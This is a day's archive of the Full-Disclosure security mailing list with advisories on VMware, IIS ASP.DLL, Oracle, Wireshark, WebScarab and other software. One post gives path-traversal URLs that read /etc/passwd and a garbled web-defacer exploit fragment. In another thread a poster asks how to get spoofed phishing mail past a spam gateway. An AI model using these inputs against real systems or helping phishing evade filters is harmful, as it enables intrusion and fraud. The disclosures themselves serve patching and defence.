[Full-disclosure] VMSA-2006-0003 VMware possible incorrect permissions on SSL key files

2006-07-18 Thread VMware Security Team
---
   VMware Security Advisory

Advisory ID:   VMSA-2006-0003
Synopsis:  VMware possible incorrect permissions on SSL key files
VMware Player for Linux
VMware Workstation for Linux
VMware Server for Linux
VMware ESX Server 2.x
VMware Infrastructure 3

NOT VULNERABLE: VMware Player for Windows
NOT VULNERABLE: VMware Workstation for Windows
NOT VULNERABLE: VMware Server for Windows
VMTN Knowledge Base URL: http://kb.vmware.com/kb/2467205
Issue date:    2006-07-18
Updated on:    2006-07-18
CVE Name:  CVE-2006-3589
---

1. Summary:

The configuration program, vmware-config.pl, may not correctly set
file permissions on the generated SSL key files, which are used for
encrypting traffic for remote administrative connections.

VMware has given this issue a Priority 3 severity rating.

2. Relevant release:

VMware Player for Linux
VMware Workstation for Linux
VMware Server for Linux
VMware Infrastructure 3

NOT VULNERABLE: VMware Player for Windows
NOT VULNERABLE: VMware Workstation for Windows
NOT VULNERABLE: VMware Server for Windows

3. Problem description:

The script vmware-config.pl sets permissions on the key and
certificate files to safe values. However, this script does not use
the safe_chmod() subroutine, which reports errors on failure.
Instead, the native Perl chmod() function is used, without any
return code checking.

Because the safe_chmod() subroutine is not used and no return code
checks are performed, the user is not alerted if the chmod() fails.
Depending on the umask in use at the time, this could leave the
key file readable to any local user on the system.

4. Solution:

VMware is working on a fix, and there is a workaround. Manually
change the permissions on the key and certificate to their intended
values. The following commands would be appropriate on a default
installation:

# chmod 400 /etc/vmware/ssl/rui.key
# chmod 444 /etc/vmware/ssl/rui.crt
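As an added illustration (not VMware's code) of the check the advisory says safe_chmod() performs and of how an operator can verify the workaround, the following Python audits the two files against the intended modes 0400 and 0444. The temporary directory, placeholder file contents and the helper names safe_chmod/audit_ssl_dir/demo are constructed for this example; nothing here touches /etc/vmware/ssl.

```python
import os
import stat
import tempfile

# Intended modes taken from the advisory's workaround commands.
INTENDED_MODES = {"rui.key": 0o400, "rui.crt": 0o444}


def safe_chmod(path: str, mode: int) -> None:
    """chmod that fails loudly instead of silently, and verifies the result.

    This mirrors what the advisory describes safe_chmod() as doing (report
    errors on failure) and adds a read-back of the inode so that a chmod
    that "succeeded" without producing the wanted bits is also caught.
    """
    try:
        os.chmod(path, mode)  # raises OSError where Perl's chmod() just returns 0
    except OSError as exc:
        raise RuntimeError(f"chmod {oct(mode)} {path} failed: {exc}") from exc
    actual = stat.S_IMODE(os.stat(path).st_mode)
    if actual != mode:
        raise RuntimeError(f"{path}: wanted {oct(mode)}, inode has {oct(actual)}")


def audit_ssl_dir(ssl_dir: str) -> list[str]:
    """Return one finding per file whose mode is looser than intended.

    'Looser' means any permission bit set that the intended mode lacks,
    e.g. group/other read on the private key.
    """
    findings = []
    for name, wanted in INTENDED_MODES.items():
        path = os.path.join(ssl_dir, name)
        try:
            actual = stat.S_IMODE(os.stat(path).st_mode)
        except FileNotFoundError:
            findings.append(f"{name}: missing")
            continue
        extra = actual & ~wanted
        if extra:
            findings.append(
                f"{name}: mode {oct(actual)} has extra bits {oct(extra)} (want {oct(wanted)})"
            )
    return findings


def demo() -> tuple[list[str], list[str]]:
    """Create the two files as an unchecked chmod under a permissive umask
    could leave them, audit, then fix with safe_chmod and audit again."""
    ssl_dir = tempfile.mkdtemp()  # constructed stand-in for /etc/vmware/ssl
    old_umask = os.umask(0o000)  # permissive umask: new files come out 0666
    try:
        for name in INTENDED_MODES:
            with open(os.path.join(ssl_dir, name), "w") as fh:
                fh.write("constructed placeholder, not real key material\n")
    finally:
        os.umask(old_umask)
    before = audit_ssl_dir(ssl_dir)  # both files world-readable: two findings
    for name, mode in INTENDED_MODES.items():
        safe_chmod(os.path.join(ssl_dir, name), mode)
    after = audit_ssl_dir(ssl_dir)  # expected: no findings
    return before, after


if __name__ == "__main__":
    before, after = demo()
    print("before:", before)
    print("after:", after)
```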

The Common Vulnerabilities and Exposures (CVE) project has assigned the
name CVE-2006-3589 to this issue.

5. References:

http://www.cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-3589

6. Acknowledgments

VMware would like to thank Nick Breese and security-assessment.com.

7. Contact:

http://www.vmware.com/security

Copyright 2006 VMware Inc. All rights reserved.



[Full-disclosure] ASP.DLL Include File Buffer Overflow

2006-07-18 Thread Brett Moore

= ASP.DLL Include File Buffer Overflow
=
= MS Bulletin posted: 
= http://www.microsoft.com/technet/security/Bulletin/MS06-034.mspx
=
= Affected Software:
= IIS 5.0
= IIS 5.1
= IIS 6.0
=
= Public disclosure on July 19, 2006


== Overview ==

A buffer overflow exists in ASP.DLL that can be exploited by creating
a .asp file containing a parameter for the include SSI command.

  OVERFLOWDATA

The include function in ASP.DLL checks if the parameter is longer than
260 bytes. If it is, then an error is caused, but before causing the
error a miscalculated copy is done.

  mov edi, [ebp+var_228]   ; load length of parameter
  cmp edi, 104h            ; check if larger than 260 bytes
  jbe short loc_
  mov esi, [ebp+var_22C]   ; load address of parameter
  lea eax, [edi+esi-104h]  ; load eax with the address of the last
                           ; 260 bytes of the parameter
                           ; (length of string+source of string)-104h
  lea edx, [ebp+var_211]   ; load edx with address on stack
  sub edx, eax             ;
  mov cl, [eax]            ;  \
  mov [edx+eax], cl        ;   do the copy
  inc eax                  ;   and overflow the stack
  test cl, cl              ;  /
  jnz short loc_7096D1F3   ;

Funnily enough, the solution was to remove this copy as the resulting 
data was never actually used.

== Exploitation ==

Exploitation requires the ability to upload or somehow create a file
with a .asp extension in a folder that will allow .asp processing.

Since ASP.DLL usually runs under the IWAM_ account, there is no
privilege escalation through this vulnerability. It is however possible
to bypass any security restrictions enforced by ASP. It also allows for
the execution of APIs that have no ASP equivalent.

== Solutions ==

- Install the vendor supplied patch.

== Credit ==

Discovered and advised to Microsoft February, 2006 by Brett Moore of
Security-Assessment.com

Same Bug Different App
http://www.security-assessment.com/Presentations/SBDA_Ruxcon_2005.ppt

In memory of;
  http://www.nsfocus.com/english/homepage/research/0305.htm
and
  http://www.eeye.com/html/research/advisories/AD20001003.html

== About Security-Assessment.com ==

Security-Assessment.com is a leader in intrusion testing and security
code review, and leads the world with SA-ISO, online ISO17799 compliance
management solution. Security-Assessment.com is committed to security
research and development, and its team have previously identified a
number of vulnerabilities in public and private software vendors
products.


___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/


[Full-disclosure] Multiple Vulnerabilities RPS

2006-07-18 Thread 0o_zeus_o0 elitemexico.org
Advisory #13
Title: Multiple Vulnerabilities RPS (rigter portal system)
Author: 0o_zeus_o0 ( Arturo Z. )
Contact: [EMAIL PROTECTED]
Website: www.elitemexico.org
Date: 18/07/06
Risk: medium
Vendor Url: http://rps.rigtersir.com/
Affected Software: RPS
Non Affected: RPS V 4

Info:

UPLOAD FILES
It allows the user to upload files without having administration privileges.

SQL INJECTION
It allows the user to insert posts without having to be admin; with this one can do XSS or HTML injection.

Example of upload files:
http://www.vuln.com/[path]/adm/photos/images.php
http://www.vuln.com/[path]//adm/down/files.php

Example of remote execution:
http://www.vuln.com/[path]/index.php?id=../../../../../etc/passwd
http://www.vuln.com/[path]/index.php?id=../../../home/victim/public_html/index

Solution:

VULNERABLE VERSIONS
v1.0, 2.0 3.0

Contact information
0o_zeus_o0
zeus@diosdelared.com
www.elitemexico.org

greetz: lady fire, Mi beba, olimpus klan team and elitemexico

Original Advisory: http://zeus.pccentervillaflores.com//13.txt

SQL injection in "Articulos" exploit

/*
RPS Defacer by: 0o_ZEUS_o0 OliMpusKlaN •~ FX ~•
Date: 08/01/06
Website: www.elitemexico.org
*/
?>
RPS Defacer
RPS Defacer 0o_ZEUS_o0 OliMpusKlaN •~ FX ~•

Address:
Author:
Email:
Title:
Content: (Supports HTML Injection)

if($action="">$web= $_POST['url'];echo "

var pagina=\"$web/adm/add_art.php\"
function redireccionar()
{
location.href="">}
setTimeout (\"redireccionar()\", 0001);

";}?>

Re: FW: [Full-disclosure] Symantec 3300 E-mail Gateway dropping spoofed mails

2006-07-18 Thread Josh L. Perrymon
Posted inline:

On 7/19/06, Josh L. Perrymon <[EMAIL PROTECTED]> wrote:
> This email gateway is blocking email messages spoofed from my RH3
> box...
>
> The error message:
> X-NAI-Spam-Level: **
> X-NAI-Spam-Score: 2.3
> X-NAI-Spam-Report: 2 Rules triggered *  1.8 -- MIME_MISSING_BOUNDARY
> --> RAW:  MIME section missing boundary *  0.5 -- MIME_BASE64_LATIN -- RAW:
> Latin  alphabet text using base64 encodi:
> < end snip  WTF?>
>
> Never had this message before...  The gateway didn't pickup on spoofed
> senders or content. Just some weird message about Latin Alphabet and
> MIME section missing boundary?
>
> Anyone seen this before? Is this a .conf setting on my *nix mail
> server?

or could it be that the errors that it is reporting are actually true?

it seems strange for you to suddenly decide that this specific error message
somehow indicates the server is blocking your box. what made you come to
this wild conclusion?

-- mic

This message is from the remote Symantec EMail gateway and it blocks spoofed emails sent from my linux box.

This is the first time a email/spam filter has detected one of these
spoofed emails from my *nix box so I'm trying to figure what is different.

- Why was this triggered?
- What can I do to bypass it next time?
- Why did Symantec's box detect this and others haven't?

JP

Re: [Full-disclosure] Symantec 3300 E-mail Gateway dropping spoofed mails

2006-07-18 Thread mikeiscool

On 7/19/06, Josh L. Perrymon <[EMAIL PROTECTED]> wrote:

This email gateway is blocking email messages spoofed from my RH3 box...



The error message:
X-NAI-Spam-Level: **
 X-NAI-Spam-Score: 2.3
 X-NAI-Spam-Report: 2 Rules triggered *  1.8 -- MIME_MISSING_BOUNDARY --
RAW:  MIME section missing boundary *  0.5 -- MIME_BASE64_LATIN -- RAW:
Latin  alphabet text using base64 encodi:
< end snip >


WTF?

Never had this message before...  The gateway didn't pickup on spoofed
senders or content. Just some weird message about Latin Alphabet and MIME
section missing boundary?


Anyone seen this before? Is this a .conf setting on my *nix mail server?


or could it be that the errors that it is reporting are actually true?

it seems strange for you to suddenly decide that this specific error
message somehow indicates the server is blocking your box. what made
you come to this wild conclusion?

-- mic



[Full-disclosure] Symantec 3300 E-mail Gateway dropping spoofed mails

2006-07-18 Thread Josh L. Perrymon
This email gateway is blocking email messages spoofed from my RH3 box...

The error message:
X-NAI-Spam-Level: **
X-NAI-Spam-Score: 2.3
X-NAI-Spam-Report: 2 Rules triggered *  1.8 -- MIME_MISSING_BOUNDARY --
RAW:  MIME section missing boundary *  0.5 -- MIME_BASE64_LATIN -- RAW:
Latin  alphabet text using base64 encodi:
< end snip >

WTF?

Never had this message before...  The gateway didn't pickup on spoofed senders or content. Just some weird message about Latin Alphabet and MIME section missing boundary?

Anyone seen this before? Is this a .conf setting on my *nix mail server?

< full error>
Received: from target.system.com ([X.X>X>X>) by
target.system.com (Sun Java System Messaging Server 6.2-4.03 (built Sep 22 2005)) with SMTP id <[EMAIL PROTECTED]> for
[EMAIL PROTECTED]; Tue, 18 Jul 2006 11:45:21 +1000 (EST)
Received: from MI.ISP.( x.x.x.x) by target.email.server  via smtp id 059c_11c238_1652_11db_97c3_00142279d9aa; Tue, 18 Jul 2006 21:39:29 +1000
Received: from nobody by hostingcmopanby.com with local (Exim 4.52) id 1G2eVs-0004X9-Ou for [EMAIL PROTECTED] ; Tue, 18 Jul 2006 11:36:40 +1000
Date: Tue, 18 Jul 2006 11:36:40 +1000
From: Spoofed Support Dept <[EMAIL PROTECTED]>
Subject: [spam] Attention: Messenger Express Upgrade- Requires Action
To: [EMAIL PROTECTED]
Message-id: <[EMAIL PROTECTED]>
MIME-version: 1.0
Content-type: multipart/alternative; boundary=HTMLDEMO44bc3b28b4ba5
X-AntiAbuse: This header was added to track abuse, please include it with any abuse report
X-AntiAbuse: Primary Hostname -REMOVED
X-AntiAbuse: Original Domain - REMOVED
X-AntiAbuse: Originator/Caller UID/GID - [99 99] / [47 12]
X-AntiAbuse: Sender Address Domain - REMOVED
X-Source:
X-Source-Args:
X-Source-Dir:
X-NAI-Spam-Level: **
X-NAI-Spam-Score: 2.3
X-NAI-Spam-Report: 2 Rules triggered *  1.8 -- MIME_MISSING_BOUNDARY -- RAW:  MIME section missing boundary *  0.5 -- MIME_BASE64_LATIN -- RAW: Latin  alphabet text using base64 encodi
Original-recipient: rfc822;removed@removed.com

This is a MIME encoded message.
--HTMLDEMO44bc3b28b4ba5
Content-Type: text/html; charset=ISO-8859-1
Content-Transfer-Encoding: base64

DQoNCkF0dGVudGlvbiBFbWFpbCBVc2Vycyw8YnI+DQo8YnI+DQpEdWUgdG8gcmVjZW50IHNlDQoNCkF0dGVudGlvbiBFbWFpbCBVc2Vycyw8YnI+DQo8YnI+Y3Vy
(snipped)
cm8uZ292LmF1IDxicj4NCg0KDQo=
< end full >

Cheers,
JP
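As an added example (not from the original post), the following Python applies the kind of structural check that rule names such as MIME_MISSING_BOUNDARY and MIME_BASE64_LATIN describe, run over a constructed message modelled on the headers quoted above: a multipart/alternative body that declares boundary=HTMLDEMO44bc3b28b4ba5, opens one base64 ISO-8859-1 part and never emits the closing --boundary-- line. The sample messages, the function check_multipart_boundary and its heuristics are this example's own; the actual logic of the gateway's rules is not known here.

```python
import email
import re
from email import policy


def check_multipart_boundary(raw: bytes) -> list[str]:
    """Return structural findings for a raw RFC 822 message.

    Two checks, in the spirit of the two rule hits quoted in the post:
    1. the declared multipart boundary must appear as a part delimiter
       (--boundary) and be closed by a terminator (--boundary--);
    2. a text part in a Latin charset should not need base64 encoding.
    """
    msg = email.message_from_bytes(raw, policy=policy.default)
    findings: list[str] = []
    if msg.get_content_maintype() != "multipart":
        return findings  # nothing to check for single-part mail
    boundary = msg.get_boundary()
    if not boundary:
        return ["multipart/* declared without a boundary parameter"]

    # Inspect the raw body so the parser's error recovery cannot hide the gap.
    head_body = re.split(rb"\r?\n\r?\n", raw, maxsplit=1)
    body = head_body[1] if len(head_body) == 2 else b""
    b = re.escape(boundary.encode())
    delimiter = re.compile(rb"(?m)^--" + b + rb"[ \t]*\r?$")     # --boundary
    terminator = re.compile(rb"(?m)^--" + b + rb"--[ \t]*\r?$")  # --boundary--
    if not delimiter.search(body):
        findings.append(f"boundary {boundary!r} declared but no part delimiter in body")
    if not terminator.search(body):
        findings.append(f"no closing delimiter --{boundary}-- (truncated or hand-built message)")

    # Latin-alphabet text that was nevertheless base64-encoded.
    for part in msg.walk():
        if part.get_content_maintype() != "text":
            continue
        cte = str(part.get("Content-Transfer-Encoding", "")).lower()
        charset = (part.get_content_charset() or "").lower()
        if cte == "base64" and charset.startswith(("iso-8859", "us-ascii", "windows-125")):
            findings.append(f"{part.get_content_type()} ({charset}) sent as base64 Latin text")
    return findings


# Constructed sample shaped like the quoted message: boundary declared,
# one part opened, base64 HTML ("Attention Email Users,<br>"), no terminator.
BROKEN = (
    b"From: Spoofed Support Dept <support@example.invalid>\r\n"
    b"To: user@example.invalid\r\n"
    b"Subject: Attention: Messenger Express Upgrade\r\n"
    b"MIME-Version: 1.0\r\n"
    b"Content-Type: multipart/alternative; boundary=HTMLDEMO44bc3b28b4ba5\r\n"
    b"\r\n"
    b"This is a MIME encoded message.\r\n"
    b"--HTMLDEMO44bc3b28b4ba5\r\n"
    b"Content-Type: text/html; charset=ISO-8859-1\r\n"
    b"Content-Transfer-Encoding: base64\r\n"
    b"\r\n"
    b"QXR0ZW50aW9uIEVtYWlsIFVzZXJzLDxicj4=\r\n"
)
# Same message with the terminator the sender forgot.
WELL_FORMED = BROKEN + b"--HTMLDEMO44bc3b28b4ba5--\r\n"
# Ordinary single-part mail: nothing to flag.
SINGLE_PART = b"From: a@example.invalid\r\nContent-Type: text/plain\r\n\r\nhello\r\n"


if __name__ == "__main__":
    for label, sample in (("broken", BROKEN), ("well-formed", WELL_FORMED), ("plain", SINGLE_PART)):
        print(label, check_multipart_boundary(sample))
```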

[Full-disclosure] [ MDKSA-2006:128 ] - Updated wireshark packages fix numerous vulnerabilities

2006-07-18 Thread security


 ___
 
 Mandriva Linux Security Advisory MDKSA-2006:128
 http://www.mandriva.com/security/
 ___
 
 Package : wireshark
 Date: July 18, 2006
 Affected: 2006.0
 ___
 
 Problem Description:
 
 A number of vulnerabilities have been discovered in the Wireshark
 (formerly Ethereal) network analyzer.  These issues have been corrected
 in Wireshark version 0.99.2 which is provided with this update.
 ___

 References:
 
 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-3627
 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-3628
 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-3629
 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-3630
 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-3631
 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-3632
 http://www.wireshark.org/security/wnpa-sec-2006-01.html
 ___
 
 Updated Packages:
 
 ___

 To upgrade automatically use MandrivaUpdate or urpmi.  The verification
 of md5 checksums and GPG signatures is performed automatically for you.

 All packages are signed by Mandriva for security.  You can obtain the
 GPG public key of the Mandriva Security Team by executing:

  gpg --recv-keys --keyserver pgp.mit.edu 0x22458A98

 You can view other update advisories for Mandriva Linux at:

  http://www.mandriva.com/security/advisories

 If you want to report vulnerabilities, please contact

  security_(at)_mandriva.com
 ___

 Type Bits/KeyID Date   User ID
 pub  1024D/22458A98 2000-07-10 Mandriva Security Team
  


[Full-disclosure] [ MDKSA-2006:127 ] - Updated gimp packages fix buffer overflow vulnerability.

2006-07-18 Thread security


 ___
 
 Mandriva Linux Security Advisory MDKSA-2006:127
 http://www.mandriva.com/security/
 ___
 
 Package : gimp
 Date: July 18, 2006
 Affected: 2006.0
 ___
 
 Problem Description:
 
 A buffer overflow in the xcf_load_vector function in app/xcf/xcf-load.c 
 for gimp 2.2.x allows user-complicit attackers to cause a denial of
 service (crash) and possibly execute arbitrary code via an XCF file
 with a large num_axes value in the VECTORS property.
 
 Updated packages have been patched to correct this issue.
 ___

 References:
 
 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-3404
 ___
 
 Updated Packages:
 
 ___

 To upgrade automatically use MandrivaUpdate or urpmi.  The verification
 of md5 checksums and GPG signatures is performed automatically for you.

 All packages are signed by Mandriva for security.  You can obtain the
 GPG public key of the Mandriva Security Team by executing:

  gpg --recv-keys --keyserver pgp.mit.edu 0x22458A98

 You can view other update advisories for Mandriva Linux at:

  http://www.mandriva.com/security/advisories

 If you want to report vulnerabilities, please contact

  security_(at)_mandriva.com
 ___

 Type Bits/KeyID Date   User ID
 pub  1024D/22458A98 2000-07-10 Mandriva Security Team
  


[Full-disclosure] [ MDKSA-2006:126 ] - Updated libtunepimp packages fix buffer overflow vulnerabilities.

2006-07-18 Thread security


 ___
 
 Mandriva Linux Security Advisory MDKSA-2006:126
 http://www.mandriva.com/security/
 ___
 
 Package : libtunepimp
 Date: July 18, 2006
 Affected: 2006.0
 ___
 
 Problem Description:
 
 Kevin Kofler discovered multiple stack-based buffer overflows in the 
 LookupTRM::lookup function in libtunepimp 0.4.2 that allow remote 
 user-complicit attackers to cause a denial of service (application crash) 
 and possibly execute code via a long (1) Album release date 
 (MBE_ReleaseGetDate), (2) data, or (3) error strings.
 
 Updated packages have been patched to correct this issue.
 ___

 References:
 
 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-3600
 ___
 
 Updated Packages:
 
 ___

 To upgrade automatically use MandrivaUpdate or urpmi.  The verification
 of md5 checksums and GPG signatures is performed automatically for you.

 All packages are signed by Mandriva for security.  You can obtain the
 GPG public key of the Mandriva Security Team by executing:

  gpg --recv-keys --keyserver pgp.mit.edu 0x22458A98

 You can view other update advisories for Mandriva Linux at:

  http://www.mandriva.com/security/advisories

 If you want to report vulnerabilities, please contact

  security_(at)_mandriva.com
 ___

 Type Bits/KeyID Date   User ID
 pub  1024D/22458A98 2000-07-10 Mandriva Security Team
  


[Full-disclosure] [ MDKSA-2006:125 ] - Updated webmin packages fix arbitrary file read vulnerability.

2006-07-18 Thread security


 ___
 
 Mandriva Linux Security Advisory MDKSA-2006:125
 http://www.mandriva.com/security/
 ___
 
 Package : webmin
 Date: July 18, 2006
 Affected: 2006.0, Corporate 3.0
 ___
 
 Problem Description:
 
 Webmin before 1.290 and Usermin before 1.220 calls the simplify_path
 function before decoding HTML, which allows remote attackers to read
 arbitrary files.  NOTE: This is a different issue than CVE-2006-3274.
 
 Updated packages have been patched to correct this issue.
 ___

 References:
 
 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-3292
 ___
 
 Updated Packages:
 
 ___

 To upgrade automatically use MandrivaUpdate or urpmi.  The verification
 of md5 checksums and GPG signatures is performed automatically for you.

 All packages are signed by Mandriva for security.  You can obtain the
 GPG public key of the Mandriva Security Team by executing:

  gpg --recv-keys --keyserver pgp.mit.edu 0x22458A98

 You can view other update advisories for Mandriva Linux at:

  http://www.mandriva.com/security/advisories

 If you want to report vulnerabilities, please contact

  security_(at)_mandriva.com
 ___

 Type Bits/KeyID Date   User ID
 pub  1024D/22458A98 2000-07-10 Mandriva Security Team
  


Re: [Full-disclosure] Linux Privilege Escalation exploits

2006-07-18 Thread Christian Swartzbaugh

It is better to provide concise, complete, and accurate information
about vectors of attack and the potential results of those attacks to
allow people to make their own decisions.


Ratings are useful assuming they use distribution of the software and
the potential for damage as the biggest factors. This information
gives you an idea of how big an impact it could have and how many
computers are affected.

You could let people decide for themselves, but the amount of alerts
is too overwhelming for most people and it makes sense to limit what
they can see based on the risk it causes to them based on an estimated
threat level for the bigger picture.

feofil



[Full-disclosure] New PowerPoint Trojan installs itself as LSP

2006-07-18 Thread Juha-Matti Laurio

It appears that there is a new type of PowerPoint 0-day Trojan spreading;
more details are at this write-up:
http://www.symantec.com/enterprise/security_response/writeup.jsp?docid=2006-071812-3213-99

What the technical details section says is:
"Installs the file SNootern.dll as a layered service provider (LSP)"

Wikipedia has only a stub-type article:
http://en.wikipedia.org/wiki/Layered_Service_Provider


Is this 'mechanism' very common, and is it difficult to detect by AV?

This new Trojan, entitled Riler.F, opens a back door and tries to connect to
8800.org; the earlier Bifrose Trojan uses (or used) this domain too.

There is a new C variant of Trojan.PPDropper as well, but no information about
the file name of the PowerPoint attachment etc.
Symantec reports the Infection Length as 220,160 bytes, the same as used by
Trojan.PPDropper.B.
This size information is from the Trojan description of another vendor, however.

The related PowerPoint 0-day FAQ document has been updated with this summary.

Regards,
Juha-Matti
http://blogs.securiteam.com/index.php/archives/author/juha-matti/



[Full-disclosure] WebScarab <= 20060621-0003 cross site scripting

2006-07-18 Thread security



SA0012

+
+  WebScarab Cross Site Scripting   +
+


PUBLISHED ON
  Jul 18, 2006


PUBLISHED AT
  http://moritz-naumann.com/adv/0012/webscarabxss/0012.txt
  http://moritz-naumann.com/adv/0012/webscarabxss/0012.txt.gpg


PUBLISHED BY
  Moritz Naumann IT Consulting & Services
  Hamburg, Germany
  http://moritz-naumann.com/

  SECURITY at MORITZ hyphon NAUMANN d0t COM
  GPG key: http://moritz-naumann.com/keys/0x277F060C.asc


AFFECTED APPLICATION OR SERVICE
  WebScarab
  http://www.owasp.org/index.php/OWASP_WebScarab_Project
  http://sourceforge.net/projects/owasp/

  WebScarab is a Free Software for manual and semi-automatic
  web application penetration testing. It is developed in
  Java by Rogan Dawes as part of the Open Web Application
  Security Project (OWASP).


AFFECTED VERSIONS
  Version 20060621-0003 and below


ISSUES
  WebScarab is subject to a client-side script code injection
  vulnerability which may allow running cross site
  scripting attacks against web clients connecting through it.

  + 1. Cross Site Scripting vulnerability in error
   messages

  By accessing the following URI using a web browser which is
  prone to this issue and configured to proxy through a
  vulnerable version of WebScarab, a non-persistent web script
  injection can be achieved:

  http://arbitrary.domain/alert(0);

  This allows for disclosure of sensitive data stored in the
  security context of any arbitrary domain which the web browser
  has previously accessed but WebScarab is not able to access
  by the time the attack takes place (due to invalid upstream
  proxy setting on WebScarab, different results of DNS queries,
  limited connectivity or other reasons).

  MS Internet Explorer 6 SP2 and Konqueror 3.5.3 are known to
  be prone to this issue. This problem is caused by insufficient
  sanitation of user-supplied input before it is returned to
  the client as part of an error message.


BACKGROUND
  Cross Site Scripting (XSS):
  Cross Site Scripting, also known as XSS or CSS, describes
  the injection of malicious content into output produced
  by a web application. A common attack vector is the
  inclusion of arbitrary client side script code into the
  applications' output. Failure to completely sanitize user
  input from malicious content can cause a web application
  to be vulnerable to Cross Site Scripting.

  http://en.wikipedia.org/wiki/XSS
  http://www.cgisecurity.net/articles/xss-faq.shtml


WORKAROUNDS
  Client: Disable Javascript.
  Server: None known.


SOLUTIONS
  Rogan Dawes has released version 20060718-1904 today.
  This version fixes this issue. The updated package is
  available at

http://sourceforge.net/project/showfiles.php?group_id=64424&package_id=61823


TIMELINE
  Jul 18, 2006: Discovery, code maintainer notification
  Jul 18, 2006: Code maintainer provides fix
  Jul 18, 2006: Public advisory


REFERENCES
  N/A


ADDITIONAL CREDIT
  N/A


LICENSE
  Creative Commons Attribution-ShareAlike License Germany
  http://creativecommons.org/licenses/by-sa/2.0/de/





[Full-disclosure] Oracle Database - SQL Injection in SYS.KUPW$WORKER [DB03]

2006-07-18 Thread Kornbrust, Alexander

Name        SQL Injection in package SYS.KUPW$WORKER (6980775) [DB03]
Systems     Oracle 10g Release 1
Severity    High Risk
Category    SQL Injection
Vendor URL  http://www.oracle.com/
Author      Alexander Kornbrust (ak at red-database-security.com)
Advisory    18 Jul 2006 (V 1.00)


Advisory

http://www.red-database-security.com/advisory/oracle_sql_injection_kupw$worker.html


Details
###
The package SYS.KUPW$WORKER contains a SQL injection vulnerability in
the MAIN procedure. This procedure is granted to PUBLIC by default.
Oracle fixed this vulnerability with the package dbms_assert. To exploit
this vulnerability it is necessary to have the privilege to create a
PL/SQL-function.


Patch Information
#################
Apply the patches for Oracle CPU July 2006 on top of Oracle 10g Release 1.


History
#######
01-nov-2005 Oracle secalert was informed
02-nov-2005 Bug confirmed
18-jul-2006 Oracle published CPU July 2006 [DB03]
18-jul-2006 Advisory published


Additional Information
######################
An analysis of the Oracle CPU July 2006 is available here:
http://www.red-database-security.com/advisory/oracle_cpu_july_2006.html

This document will be updated during the next few days and weeks with
the latest information.



[Full-disclosure] Oracle Database - SQL Injection in SYS.DBMS_STATS [DB21]

2006-07-18 Thread Kornbrust, Alexander
Name        SQL Injection in package SYS.DBMS_STATS (6980751) [DB21]
Systems     Oracle 10g Release 1
Severity    High Risk
Category    SQL Injection
Vendor URL  http://www.oracle.com/
Author      Alexander Kornbrust (ak at red-database-security.com)
Advisory    18 Jul 2006 (V 1.00)


Advisory
########

http://www.red-database-security.com/advisory/oracle_sql_injection_dbms_stats.html


Details
#######
The package SYS.DBMS_STATS contains a SQL injection vulnerability.
Oracle fixed these vulnerabilities with the package dbms_assert. To
exploit this vulnerability it is necessary to have the privilege to
create a PL/SQL-function.


Patch Information
#################
Apply the patches for Oracle CPU July 2006 on top of Oracle 10g Release 1.


History
#######
01-nov-2005 Oracle secalert was informed
02-nov-2005 Oracle secalert asked for an exploit
18-jul-2006 Oracle published CPU July 2006 [DB21]
18-jul-2006 Advisory published


Additional Information
######################
An analysis of the Oracle CPU July 2006 is available here:
http://www.red-database-security.com/advisory/oracle_cpu_july_2006.html

This document will be updated during the next few days and weeks with
the latest information.




[Full-disclosure] Oracle Database - SQL Injection in SYS.DBMS_UPGRADE [DB22]

2006-07-18 Thread Kornbrust, Alexander

Name        SQL Injection in package SYS.DBMS_UPGRADE (6980717) [DB22]
Systems     Oracle 10g Release 1
Severity    High Risk
Category    SQL Injection
Vendor URL  http://www.oracle.com/
Author      Alexander Kornbrust (ak at red-database-security.com)
Advisory    18 Jul 2006 (V 1.00)

Advisory
########

http://www.red-database-security.com/advisory/oracle_sql_injection_dbms_upgrade.html


Details
#######
The package SYS.DBMS_UPGRADE contains a SQL injection vulnerability.
Oracle fixed these vulnerabilities with the package dbms_assert. To
exploit this vulnerability it is necessary to have the privilege to
create a PL/SQL-function.


Patch Information
#################
Apply the patches for Oracle CPU July 2006 on top of Oracle 10g Release 1.


History
#######
01-nov-2005 Oracle secalert was informed
02-nov-2005 Oracle secalert asked for an exploit
18-jul-2006 Oracle published CPU July 2006 [DB22]
18-jul-2006 Advisory published


Additional Information
######################
An analysis of the Oracle CPU July 2006 is available here:
http://www.red-database-security.com/advisory/oracle_cpu_july_2006.html

This document will be updated during the next few days and weeks with
the latest information.



RE: [Full-disclosure] [SECURITY] [DSA 1113-1] New zope2.7 packages fix information disclosure

2006-07-18 Thread Joseph Pierini
Done

Joseph Pierini, CISSP | Director, Enterprise Services
ScanAlert ( www.scanalert.com)



-Original Message-
From: [EMAIL PROTECTED] [mailto:[EMAIL PROTECTED] On Behalf Of Moritz Muehlenhoff
Sent: Tuesday, July 18, 2006 2:22 PM
To: debian-security-announce@lists.debian.org
Subject: [Full-disclosure] [SECURITY] [DSA 1113-1] New zope2.7 packages fix information disclosure


[Full-disclosure] [SECURITY] [DSA 1113-1] New zope2.7 packages fix information disclosure

2006-07-18 Thread Moritz Muehlenhoff

--------------------------------------------------------------------------
Debian Security Advisory DSA 1113-1                      [EMAIL PROTECTED]
http://www.debian.org/security/                         Moritz Muehlenhoff
July 18th, 2006                         http://www.debian.org/security/faq
--------------------------------------------------------------------------

Package: zope2.7
Vulnerability  : programming error
Problem-Type   : remote
Debian-specific: no
CVE ID : CVE-2006-3458
Debian Bug : 377277

It was discovered that the Zope web application server allows read access
to arbitrary pages on the server, if a user has the privilege to edit
"restructured text" pages.

For the stable distribution (sarge) this problem has been fixed in
version 2.7.5-2sarge2.

The unstable distribution (sid) no longer contains Zope 2.7 packages.

We recommend that you upgrade your zope2.7 package.


Upgrade Instructions
--------------------

wget url
will fetch the file for you
dpkg -i file.deb
will install the referenced file.

